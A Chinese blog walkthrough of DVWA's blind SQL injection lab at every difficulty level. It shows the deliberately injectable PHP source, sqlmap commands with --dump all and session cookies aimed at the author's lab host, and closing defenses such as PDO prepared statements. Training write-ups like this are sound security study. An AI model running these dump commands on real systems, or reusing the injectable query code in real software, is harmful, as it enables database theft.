首页 > 数据库 >DVWA靶机-全级别测试-SQL注入(盲注)

DVWA靶机-全级别测试-SQL注入(盲注)

时间:2023-01-20 11:39:35浏览次数:39  
标签:false exists DVWA query user SQL mysqli 盲注 id


sql盲注


盲注只回复是或否,Sql注入回复详细信息;

过程一般如下:


1、判断是否存在注入,注入时字符型还是数字型

2、猜解数据库的长度,猜解数据库的名称

3、猜解数据库中有几个表,猜解表的长度,猜解表的名称

4、猜解表中有几个字段、猜解字段长度,猜解字段名称

5、猜解数据


手工方式太慢了,故我们使用工具进行猜解


低难度


设置


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite


源代码:


<?php

if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
$exists = false;

switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

$exists = false;
if ($result !== false) {
try {
$exists = (mysqli_num_rows( $result ) > 0);
} catch(Exception $e) {
$exists = false;
}
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}

break;
}

if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}

}

?>


DVWA靶机-全级别测试-SQL注入(盲注)_User_02


可以看到,返回信息已经简化了


DVWA靶机-全级别测试-SQL注入(盲注)_User_03


将页面发送到CO2分析


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_04


点击run,进行猜解


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_05


数据库可以猜解,下面我们进行数据的猜解

参数--dump all

-u "http://42.194.205.186:80/DVWA/vulnerabilities/sqli_blind/?id=1^&Submit=Submit" --cookie="td_cookie=3687296581;td_cookie=3687686252;td_cookie=3687788067;PHPSESSID=odn198v1riodhe8ht89ifclgm6;security=low" --dump all


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_06


中难度


设置


DVWA靶机-全级别测试-SQL注入(盲注)_User_07


源代码:


<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$exists = false;

switch ($_DVWA['SQLI_DB']) {
case MYSQL:
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

$exists = false;
if ($result !== false) {
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
}

break;
case SQLITE:
global $sqlite_db_connection;

$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}
break;
}

if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}

?>


页面是post方法提交


DVWA靶机-全级别测试-SQL注入(盲注)_User_08


看起来是简单的

我们换个工具


DVWA靶机-全级别测试-SQL注入(盲注)_User_09


填写基础信息


DVWA靶机-全级别测试-SQL注入(盲注)_User_10


注意填写post data


DVWA靶机-全级别测试-SQL注入(盲注)_User_11


这软件抽风了,昨天还行,今天不行了


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_12


发送到CO2插件


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_13


参数--dump all直接下载数据


DVWA靶机-全级别测试-SQL注入(盲注)_User_14


等待结果中


DVWA靶机-全级别测试-SQL注入(盲注)_User_15


高难度


设置


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_16


源代码:


<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
$exists = false;

switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

$exists = false;
if ($result !== false) {
// Get results
try {
$exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
} catch(Exception $e) {
$exists = false;
}
}

((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
try {
$results = $sqlite_db_connection->query($query);
$row = $results->fetchArray();
$exists = $row !== false;
} catch(Exception $e) {
$exists = false;
}

break;
}

if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}

// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}

?>


看效果


DVWA靶机-全级别测试-SQL注入(盲注)_User_17


拼接画面


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_18


将其sqlmap二次注入

加入参数--second-url


DVWA靶机-全级别测试-SQL注入(盲注)_sqlite_19


设置好参数信息


-u "http://42.194.205.186:80/DVWA/vulnerabilities/sqli_blind/cookie-input.php" --data="id=3^&Submit=Submit" --level=2 --second-url="http://42.194.205.186/DVWA/vulnerabilities/sqli_blind/" --cookie="td_cookie=3687296581;id=2;td_cookie=3687686252;td_cookie=3687788067;PHPSESSID=odn198v1riodhe8ht89ifclgm6;security=high"


DVWA靶机-全级别测试-SQL注入(盲注)_User_20


点击run


DVWA靶机-全级别测试-SQL注入(盲注)_User_21


下载里面数据


python sqlmap.py -r 3.txt -p id --second-url="http://42.194.205.186/DVWA/vulnerabilities/sqli_blind/" --dump all


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_22


DVWA靶机-全级别测试-SQL注入(盲注)_User_23


不可能难度

设置


DVWA靶机-全级别测试-SQL注入(盲注)_mysql_24


源代码:


<?php

if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
$exists = false;

// Get input
$id = $_GET[ 'id' ];

// Was a number entered?
if(is_numeric( $id )) {
$id = intval ($id);
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();

$exists = $data->rowCount();
break;
case SQLITE:
global $sqlite_db_connection;

$stmt = $sqlite_db_connection->prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' );
$stmt->bindValue(':id',$id,SQLITE3_INTEGER);
$result = $stmt->execute();
$result->finalize();
if ($result !== false) {
// There is no way to get the number of rows returned
// This checks the number of columns (not rows) just
// as a precaution, but it won't stop someone dumping
// multiple rows and viewing them one at a time.

$num_columns = $result->numColumns();
if ($num_columns == 1) {
$row = $result->fetchArray();

$numrows = $row[ 'numrows' ];
$exists = ($numrows == 1);
}
}
break;
}

}

// Get results
if ($exists) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
} else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}

// Generate Anti-CSRF token
generateSessionToken();

?>


使用pdo技术,没得玩,同时返回的查询结果为1,才会输出。


防御措施


1、使用PDO技术

2、多做SQL查询限制

3、增加WAF

标签:false,exists,DVWA,query,user,SQL,mysqli,盲注,id
From: https://blog.51cto.com/apple0/6020564

相关文章

  • T-SQL 模拟彩票预测
    比较简单,只是模拟彩票出数字的过程,不计算单一数字的出现概率。传统上来说,每次彩票出号的概率都是独立事件,单纯的在可选数字内随机实现即可。本文探索的是实现简单的预测......
  • MySQL索引使用宝典已送达,快来查缺补漏 转载
    这一篇文章来聊一聊如何用好MySQL索引。  为了更好地进行解释,我创建了一个存储引擎为InnoDB的表user_innodb,并批量初始化了500W+条数据。包含主键id、姓名字段(name)、......
  • Mysql8开启root远程并设置访问密码
    和旧版本设置,有点不一样mysql-urootmysql>usemysql;#查看user表信息,注意密码字段已改为autentication_stringmysql>selectuser,host,authentication_string......
  • 2022最新MySQL高频面试题汇总
    sidebar:heading事务的四大特性?事务特性ACID:原子性(Atomicity)、一致性(Consistency)、隔离性(Isolation)、持久性(Durability)。原子性是指事务包含的所有操作要么全部成......
  • DVWA靶场实战(八)——SQL Injection(Blind)
    DVWA靶场实战(八)八、SQLInjection(Blind):1.漏洞原理:SQLInjection(Blind)全称为SQL注入之盲注,其实与正常的SQL大同小异,区别在于一般的注入攻击者可以直接从页面上获......
  • hsqldb
    HSQLDB(HyperSQLDataBase)是一个开放源代码的JAVA数据库,其具有标准的SQL语法和JAVA接口,它可以自由使用和分发,非常简洁和快速的。在其官网可以获得最新的程序源代码及jar包......
  • 从管易云到MySQL通过接口配置打通数据
    ​​​​数据源平台:管易云管易云是金蝶旗下专注提供电商企业管理软件服务的子品牌,先后开发了C-ERP、EC-OMS、EC-WMS、E店管家、BBC、B2B、B2C商城网站建设等产品和服务,涵盖......
  • 从管易云到MySQL通过接口配置打通数据
    从管易云到MySQL通过接口配置打通数据数据源平台:管易云管易云是金蝶旗下专注提供电商企业管理软件服务的子品牌,先后开发了C-ERP、EC-OMS、EC-WMS、E店管家、BBC、B2B......
  • 安装MySQL报错
    Publickeyformysql-community-common-5.7.41-1.el7.x86_64.rpmisnotinstalled解决方法:重新导入秘钥rpm--import​​https://repo.mysql.com/RPM-GPG-KEY-mysql-2022......
  • python操作mysql基础
    importpymysqlconfig={'host':'127.0.0.1','port':3306,'user':'root','password':'root','database':'sys','cursorclass':......